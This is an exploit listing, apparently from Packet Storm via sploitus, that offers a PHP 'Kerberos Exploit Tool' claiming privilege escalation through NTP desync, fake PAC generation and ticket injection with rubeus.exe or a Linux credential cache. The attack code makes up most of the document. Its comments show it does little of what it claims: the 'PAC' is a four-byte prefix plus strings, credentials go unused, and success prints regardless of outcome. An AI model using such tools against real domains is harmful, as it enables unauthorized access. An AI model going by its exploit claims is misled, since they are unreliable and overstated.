## https://sploitus.com/exploit?id=PACKETSTORM:189632
=============================================================================================================================================
| # Title : Kerberos V5-1.21.3 Privilege Escalation & Ticket Injection Tool Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits) |
| # Vendor : https://web.mit.edu/kerberos/ |
=============================================================================================================================================
POC :
[+] Dorking in Google or other search engines.
[+] Code Description: This code is written in PHP and is intended to perform attacks on Kerberos via ticket injection and NTP desync. It runs on Windows and Linux.
(Related: https://packetstorm.news/files/id/180752/ — linked CVE number: CVE-2014-6324).
[+] Save the code as poc.php.
[+] Set the target: line 66
[+] PayLoad :
<?php
// Kerberos Exploit Tool
// Supports Windows & Linux
// Features: NTP desync, PAC manipulation, RC4-HMAC bypass, Ticket Injection
// Author: Indoushka
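/**
 * Report which OS family the script is running on.
 *
 * Uses PHP_OS_FAMILY instead of a substring search on PHP_OS: the original
 * `stripos(PHP_OS, 'WIN')` also matches "Darwin", so macOS was reported as
 * "Windows" and the Windows branch of inject_ticket() was taken there.
 * PHP_OS_FAMILY is an exact family name supplied by the engine.
 *
 * @return string "Windows" or "Linux". Any other family terminates the
 *                script via die(), exactly as before (no caller handles
 *                an exception, so the exit behaviour is kept).
 */
function check_os() {
    if (PHP_OS_FAMILY === 'Windows') {
        return "Windows";
    } elseif (PHP_OS_FAMILY === 'Linux') {
        return "Linux";
    } else {
        die("[!] Unsupported OS\n");
    }
}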
// NTP Desync Exploit
/**
 * Run `ntpq -p` against $target and print whether the reply contains the
 * word "unsynchronized".
 *
 * $target is shell-escaped before it is placed on the command line. stderr
 * is merged into the captured output (2>&1), so error text from the shell
 * (for instance when ntpq is not installed) is scanned like a normal reply
 * and ends up in the "synchronized" branch; only a null result from
 * shell_exec (no output at all) is reported as a failed query.
 *
 * @param string $target host name or address handed to ntpq
 * @return void all reporting is done via echo
 */
function check_ntp_sync($target) {
    $command = sprintf('ntpq -p %s 2>&1', escapeshellarg($target));
    $reply = shell_exec($command);

    if ($reply === null) {
        echo "[!] Failed to execute NTP query.\n";
        return;
    }

    // Case-insensitive search; for an ASCII needle this equals strpos(strtolower()).
    $desynced = stripos($reply, "unsynchronized") !== false;
    echo $desynced
        ? "[*] Target NTP is desynchronized - Possible Exploit!\n"
        : "[-] Target is synchronized - Harder to exploit.\n";
}
// Kerberos Ticket Injection
// Writes $ticket_data verbatim to a fixed temporary path and passes that path
// to an OS-specific command. Success is judged only by whether the command
// produced *any* output: stderr is merged via 2>&1 and neither the exit code
// nor the output text is inspected, so an error message from the tool still
// prints "[+] Ticket successfully injected.". The return value of
// file_put_contents is not checked either.
// Param:   $ticket_data - raw bytes written to the ticket file as-is.
// Returns: nothing; status is reported on stdout via echo.
function inject_ticket($ticket_data) {
$os = check_os();
if ($os == "Windows") {
// Fixed, predictable path under C:\Windows\Temp; rubeus.exe is resolved via PATH.
$ticket_path = "C:\\Windows\\Temp\\ticket.kirbi";
file_put_contents($ticket_path, $ticket_data);
$result = shell_exec("rubeus.exe ptt /ticket:" . escapeshellarg($ticket_path) . " 2>&1");
} else {
// putenv() sets KRB5CCNAME in this process's environment (inherited by the
// spawned klist). The cache lives at a fixed path in /tmp. `klist -c` lists
// a credential cache rather than importing one, and nothing validates that
// $ticket_data is a cache at all.
putenv("KRB5CCNAME=/tmp/krb5cc_0");
$ticket_path = "/tmp/krb5cc_0";
file_put_contents($ticket_path, $ticket_data);
$result = shell_exec("klist -c " . escapeshellarg($ticket_path) . " 2>&1");
}
// null only means "no output at all", not "command failed" (see header comment).
if ($result === null) {
echo "[!] Ticket injection failed.\n";
} else {
echo "[+] Ticket successfully injected.\n";
}
}
// Generate Fake PAC
/**
 * Build the blob that inject_ticket() later writes to disk.
 *
 * The result is exactly: the 32-bit value 0x00020000 in little-endian byte
 * order, followed by $domain and then $user_sid as raw strings. No PAC
 * header, buffer table, signature or checksum is produced, and nothing here
 * talks to a KDC.
 *
 * @param string $user_sid appended verbatim after the domain
 * @param string $domain   appended verbatim after the 4-byte prefix
 * @return string binary-safe concatenation described above
 */
function generate_pac($user_sid, $domain) {
    // 'V' = unsigned 32-bit little-endian; 'a*' = the string as-is, no padding.
    return pack('Va*a*', 0x00020000, $domain, $user_sid);
}
// Main Exploit Function
/**
 * Driver: announce the target, run the NTP check, build the blob with
 * generate_pac() and hand it to inject_ticket().
 *
 * $username and $password are accepted for interface compatibility but are
 * never read; no authentication or network request is made here.
 *
 * @param string $target   host passed to check_ntp_sync()
 * @param string $username unused
 * @param string $password unused
 * @param string $domain   forwarded to generate_pac()
 * @param string $user_sid forwarded to generate_pac()
 * @return void all reporting is done via echo/printf
 */
function kerberos_exploit($target, $username, $password, $domain, $user_sid) {
    printf("[*] Targeting %s in domain %s\n", $target, $domain);
    check_ntp_sync($target);
    inject_ticket(generate_pac($user_sid, $domain));
    echo "[+] Exploit completed. Check your privileges!\n";
}
// Example Usage
// Placeholder values as shipped with the PoC. Note that kerberos_exploit() is
// called at load time, so merely including this file runs it.
$target_ip   = "192.168.1.100";
$user        = "victim";
$pwd         = "password123";
$domain_name = "DEMO.LOCAL";
$user_sid    = "S-1-5-21-1234567890-1234567890-1234567890-1000";
// Positional spread keeps the argument order (target, user, pwd, domain, sid).
kerberos_exploit(...[$target_ip, $user, $pwd, $domain_name, $user_sid]);
?>
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================